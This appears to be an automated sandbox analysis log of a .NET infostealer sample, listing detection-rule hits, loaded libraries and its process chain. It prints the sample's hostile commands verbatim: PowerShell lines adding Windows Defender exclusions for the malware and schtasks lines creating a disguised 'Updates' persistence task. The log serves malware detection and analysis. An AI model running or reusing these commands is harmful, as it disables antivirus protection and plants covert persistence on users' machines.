Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: AWB#150332.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nYNBzxFhCu.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, ivMw3WGb8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, ivMw3WGb8.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, cdw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, cdw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, yoMJA2saKUL4yKFFtX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.cs | Security API names: _0020.SetAccessControl
Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.cs | Security API names: _0020.AddAccessRule
Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, yoMJA2saKUL4yKFFtX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFFF1.tmpJump to behavior
                    Source: AWB#150332.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: AWB#150332.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AWB#150332.exeReversingLabs: Detection: 26%
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile read: C:\Users\user\Desktop\AWB#150332.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\AWB#150332.exe "C:\Users\user\Desktop\AWB#150332.exe"
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: ucrtbase_clr0400.dll (2 entries)
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe - Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\AWB#150332.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder - Window detected: More than 3 window changes detected
